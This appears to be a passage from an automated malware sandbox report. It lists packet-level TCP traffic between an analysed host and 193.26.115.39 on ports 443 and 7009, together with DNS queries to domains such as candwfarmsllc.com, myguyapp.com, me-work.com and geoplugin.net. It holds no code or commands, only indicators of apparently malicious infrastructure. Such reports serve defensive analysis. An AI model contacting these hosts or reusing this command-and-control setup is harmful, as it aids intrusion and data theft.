                                                                                      Jan 11, 2025 22:53:08.192292929 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192320108 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192332029 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192359924 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192377090 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192594051 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192636967 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192668915 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192682028 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192715883 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192733049 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.240932941 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.240973949 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.241034985 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.241049051 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.241075993 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.241187096 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.244821072 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.244863033 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.244894981 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.244908094 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.244934082 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.244952917 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278016090 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278063059 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278093100 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278109074 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278137922 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278156042 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278482914 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278553009 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278559923 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278587103 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278624058 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278645039 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278848886 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278887033 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278914928 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278927088 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278955936 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278975010 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279051065 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279104948 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279133081 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279145956 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279172897 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279191971 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279376984 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279417992 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279443979 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279455900 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279496908 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279496908 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279865026 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279907942 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279942036 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279979944 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.487370968 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.487464905 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521754026 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521802902 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521831036 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521876097 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521899939 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521930933 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521943092 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521976948 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521990061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522020102 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522044897 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522056103 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522104025 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522115946 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522157907 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522170067 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522217989 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522244930 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522258043 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522300005 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522316933 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522365093 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522373915 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522388935 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522412062 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522444963 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522454023 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522499084 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522517920 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522532940 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522563934 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522567987 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522610903 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522630930 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522644043 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522669077 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522674084 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522712946 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522732019 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522746086 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522775888 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522775888 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522821903 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522844076 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522857904 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522881985 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522890091 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522985935 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.523000956 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.539685011 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.539733887 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.539773941 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.539791107 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.539820910 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.539937019 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.539975882 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540003061 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540015936 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540041924 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540132999 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540178061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540203094 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540216923 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540246010 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540469885 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540512085 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540534019 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540553093 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540575981 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540594101 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540810108 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540858984 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540879011 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.540893078 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.540932894 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.541204929 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.541241884 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.541273117 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.541285992 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.541315079 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.589816093 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.589883089 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.589893103 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.589915991 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.589956045 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.591999054 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.592041969 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.592086077 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.592098951 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.592128992 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.626488924 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.626540899 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.626557112 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.626571894 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.626600981 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.626616955 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.626919985 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.626964092 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.626995087 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627007008 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627044916 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627187014 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627232075 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627259016 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627270937 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627305984 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627521038 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627559900 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627583981 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627597094 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627625942 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627824068 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627871037 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627890110 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.627901077 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.627933979 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.628168106 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.628206968 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.628230095 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.628242970 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.628269911 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.674968958 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.675018072 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.675056934 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.675093889 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.675123930 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.678798914 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.678838968 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.678884983 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.678899050 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.678946018 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.713506937 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.713574886 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.713630915 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.713630915 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.713654041 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.713682890 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.714201927 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714240074 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714271069 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.714282990 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714310884 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.714567900 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714613914 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714629889 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.714643955 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714677095 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.714962006 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.714998960 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715027094 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.715039968 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715070009 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.715089083 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.715276003 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715332031 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715348959 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.715361118 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715406895 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.715501070 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715548992 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715572119 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.715584040 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.715610981 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.761936903 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.761976957 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.762042999 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.762106895 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.762140036 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.765522957 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.765569925 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.765618086 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.765633106 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.765665054 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.800132990 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.800177097 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.800211906 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.800240040 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.800268888 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801117897 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801166058 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801207066 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801219940 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801248074 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801422119 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801459074 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801490068 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801502943 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801532984 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801716089 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801781893 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801796913 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801847935 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.801876068 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.801930904 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:12.521024942 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:12.527097940 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:13.544465065 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.175228119 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.180097103 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:07.180253983 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.183945894 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.188719988 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:07.693988085 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:07.743350983 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.835750103 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:07.839797974 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.844754934 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:07.845463037 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:07.850436926 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.051038027 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.053980112 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:08.058881998 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.218000889 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.268954039 CET4983080192.168.2.4178.237.33.50
                                                                                      Jan 11, 2025 22:54:08.273864031 CET8049830178.237.33.50192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.274363041 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:08.274377108 CET4983080192.168.2.4178.237.33.50
                                                                                      Jan 11, 2025 22:54:08.274575949 CET4983080192.168.2.4178.237.33.50
                                                                                      Jan 11, 2025 22:54:08.279422045 CET8049830178.237.33.50192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.890670061 CET8049830178.237.33.50192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.890786886 CET4983080192.168.2.4178.237.33.50
                                                                                      Jan 11, 2025 22:54:08.904665947 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:08.909533978 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:09.891613960 CET8049830178.237.33.50192.168.2.4
                                                                                      Jan 11, 2025 22:54:09.891697884 CET4983080192.168.2.4178.237.33.50
                                                                                      Jan 11, 2025 22:54:21.930099010 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:21.931827068 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:21.936774015 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:51.946358919 CET700949822193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:54:51.948503971 CET498227009192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:54:51.953430891 CET700949822193.26.115.39192.168.2.4

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 11, 2025 22:52:58.293682098 CET5866953192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:52:58.300842047 CET53586691.1.1.1192.168.2.4
                                                                                      Jan 11, 2025 22:53:00.661736965 CET6125653192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:53:00.698678970 CET53612561.1.1.1192.168.2.4
                                                                                      Jan 11, 2025 22:53:11.886923075 CET5077353192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:53:40.679752111 CET5690853192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:53:40.688468933 CET53569081.1.1.1192.168.2.4
                                                                                      Jan 11, 2025 22:54:07.160412073 CET5788253192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:54:07.172962904 CET53578821.1.1.1192.168.2.4
                                                                                      Jan 11, 2025 22:54:08.255458117 CET6351853192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:54:08.262870073 CET53635181.1.1.1192.168.2.4
                                                                                      Jan 11, 2025 22:54:20.493724108 CET6419153192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:54:20.500967026 CET53641911.1.1.1192.168.2.4
                                                                                      Jan 11, 2025 22:54:44.572139025 CET5472953192.168.2.41.1.1.1
                                                                                      Jan 11, 2025 22:54:44.580970049 CET53547291.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 11, 2025 22:52:58.293682098 CET192.168.2.41.1.1.10x28dStandard query (0)candwfarmsllc.comA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:53:00.661736965 CET192.168.2.41.1.1.10xf12Standard query (0)myguyapp.comA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:53:11.886923075 CET192.168.2.41.1.1.10x6cf2Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:53:40.679752111 CET192.168.2.41.1.1.10x6694Standard query (0)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:07.160412073 CET192.168.2.41.1.1.10xbc1dStandard query (0)me-work.comA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:08.255458117 CET192.168.2.41.1.1.10x33a2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:20.493724108 CET192.168.2.41.1.1.10x3cd2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:44.572139025 CET192.168.2.41.1.1.10x1d23Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 11, 2025 22:52:58.300842047 CET1.1.1.1192.168.2.40x28dNo error (0)candwfarmsllc.com193.26.115.39A (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:53:00.698678970 CET1.1.1.1192.168.2.40xf12No error (0)myguyapp.com193.26.115.39A (IP address)IN (0x0001)false
